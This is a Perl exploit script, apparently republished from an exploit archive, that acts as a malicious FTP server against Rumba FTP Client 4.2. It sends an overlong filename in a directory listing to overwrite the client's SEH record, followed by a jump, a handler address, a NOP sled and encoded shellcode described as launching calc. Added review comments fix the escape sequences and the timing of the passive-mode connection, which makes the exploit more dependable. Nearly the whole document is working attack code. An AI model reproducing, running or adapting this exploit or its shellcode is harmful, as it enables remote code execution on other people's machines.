
Rumba ftp Client 4.2 PASV BoF (SEH)

Posted on 25 April 2010

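#!/usr/bin/perl
# Exploit Title: Rumba ftp Client 4.2 PASV BoF (SEH)
# Date: 2010-04-24
# Author: zombiefx & corelanc0d3r
# Email: darkernet[at]gmail.com
# Software Link: http://download.cnet.com/Rumba-FTP/3000-2160_4-10587778.html
# Version: Rumba ftp client 4.2
# Tested on: Windows XP SP3
#
# SEH overwrite occurs when sending the directory listing to the client with an
# overly long filename extension. *Note version 4.2.3 might also suffer from this.
# released without the blessing of corelanc0d3r :(
#
# Usage: ./rumbaftp_exploit   (binding TCP/21 normally requires root)
#
# How it works: this script is a *malicious FTP server*. The vulnerable client
# connects to it, logs in, issues PASV and LIST, and receives a directory
# listing whose filename extension is long enough to overwrite the client's
# SEH record. The listener binds every local interface, so anything that can
# reach this host on TCP/21 can connect to it.
#
# NOTE(review): the web rendering of this listing had stripped the backslash
# from every escape sequence ("x77" where the code reads "\x77", a bare space
# where "\r\n" terminated each FTP reply, "/" where the code reads "\"/\"").
# They are restored below; FTP replies are CRLF-terminated per RFC 959.
#
# Inj3ct0r.com [2010-04-25]

use strict;
use warnings;
use IO::Socket;

# Address the *client* must use to reach this host for the data connection,
# in PASV's comma-separated form. 127,0,0,1 only works when the client runs on
# the same machine; set it to this host's reachable IP for a remote client.
my $pasvip   = '127,0,0,1';
my $pasvport = 31337;

# PASV advertises the data port as two bytes: port = p1*256 + p2.
my ( $p1, $p2 ) = ( int( $pasvport / 256 ), $pasvport % 256 );

# Listening socket for the PASV data connection. It is created when the client
# sends PASV (before the 227 reply) so that a client which connects to the data
# port immediately after 227 -- the usual order -- is not refused; the original
# only opened it after LIST arrived.
my $pasvsock;

my $sock = IO::Socket::INET->new(
    LocalPort => 21,
    Proto     => 'tcp',
    Listen    => 1,
    ReuseAddr => 1,    # allow an immediate restart after a previous run
) or die "Socket Not Created $!\n";

print "#############################################################\n"
    . "# Rumba ftp Client 4.2 PASV BoF (SEH)                       #\n"
    . "# By: zombiefx & corelanc0d3r                               #\n"
    . "# Listening on port 21 with pasv port of $pasvport           #\n"
    . "#############################################################\n";

while ( my $data = $sock->accept() ) {
    print "Client Connected! Awaiting Ftp commands:\n";
    print {$data} "220 Gangsta Rap Made Me Do It\r\n";

    # Minimal fake FTP dialogue: echo every command to stdout and answer just
    # enough of them for the client to get as far as PASV + LIST.
    while ( my $cmd = <$data> ) {
        print $cmd;
        print {$data} "331 Anonymous access allowed\r\n" if $cmd =~ /USER/i;
        print {$data} "230-Welcome to N0 M4Ns l4nd.\r\n230 User logged in.\r\n"
            if $cmd =~ /PASS/i;
        print {$data} "215 UNIX Type: L8\r\n"                  if $cmd =~ /SYST/i;
        print {$data} "257 \"/\" is current directory.\r\n"   if $cmd =~ /PWD/i;
        print {$data} "200 Type set to I.\r\n"                 if $cmd =~ /TYPE I/i;
        print {$data} "200 Type set to A.\r\n"                 if $cmd =~ /TYPE A/i;
        print {$data} "214 Syntax: SITE - (site-specific commands)\r\n"
            if $cmd =~ /HELP/i;
        if ( $cmd =~ /PASV/i ) {
            $pasvsock ||= pasv_listen( $p1, $p2 );
            print {$data} "227 Entering Passive Mode ($pasvip,$p1,$p2)\r\n";
        }
        if ( $cmd =~ /LIST/i ) {
            # The original sends 150 and 226 *before* the data; that ordering
            # is not RFC-correct but it is the tested sequence, so it is kept.
            print {$data} "150 Here comes the directory listing.\r\n"
                . "226 Directory send OK.\r\n";
            senddata( $p1, $p2 );
        }
    }
    print "Payload delivered check the client!\n";
}

# Open the listening socket for the PASV data connection.
# Arguments: the two PASV port bytes (port = hi*256 + lo).
# Returns the IO::Socket::INET listener; dies if the port cannot be bound.
sub pasv_listen {
    my ( $hi, $lo ) = @_;
    my $port = $hi * 256 + $lo;
    my $listener = IO::Socket::INET->new(
        LocalPort => $port,
        Proto     => 'tcp',
        Listen    => 1,
        ReuseAddr => 1,
    ) or die "Cannot listen on pasv port $port: $!\n";
    return $listener;
}

# Accept the client's data connection and send the malicious directory listing.
# Arguments: the two PASV port bytes, exactly as the original took them.
# Side effects: uses (and, if needed, creates) the file-scoped $pasvsock
# listener, writes one listing line to the data connection, then closes both
# the data connection and the listener so the next client gets a fresh one.
sub senddata {
    my ( $hi, $lo ) = @_;
    my $port = $hi * 256 + $lo;

    # Fallback for a client that sends LIST without a preceding PASV.
    $pasvsock ||= pasv_listen( $hi, $lo );
    my $pasvdata = $pasvsock->accept()
        or die "Accept on pasv port $port failed: $!\n";

    # 1351 bytes of filler reach the SEH record on the client's stack.
    my $junk = "\x77" x 1351;

    # Handler address inside ftplogic.dll (per the original author's note);
    # presumably a pop/pop/ret gadget, but the listing does not say so.
    my $seh = pack( 'V', 0x1006E534 );

    # nSEH: "jmp short +6" over the handler address, into the NOP sled.
    my $nseh = "\xeb\x06\x90\x90";
    my $nops = "\x90" x 50;

    # The authors named this "calc" shellcode; the leading bytes look like
    # msfencode x86/alpha_mixed output, which is not verified here.
    my $calcshell =
          "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49"
        . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
        . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
        . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
        . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
        . "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47"
        . "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c"
        . "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a"
        . "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50"
        . "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43"
        . "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a"
        . "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c"
        . "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44"
        . "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c"
        . "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47"
        . "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50"
        . "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44"
        . "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43"
        . "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42"
        . "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b"
        . "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45"
        . "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

    my $payload = $junk . $nseh . $seh . $nops . $calcshell;

    # The overflow is in the filename *extension*: everything after "test.".
    print {$pasvdata}
        "-rw-rw-r-- 1 1176 1176 1060 Apr 23 23:17 test.$payload\r\n";

    # Closing the data connection is how the client learns the listing ended.
    close $pasvdata or warn "close of data connection failed: $!\n";
    close $pasvsock;
    undef $pasvsock;
    return;
}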

 
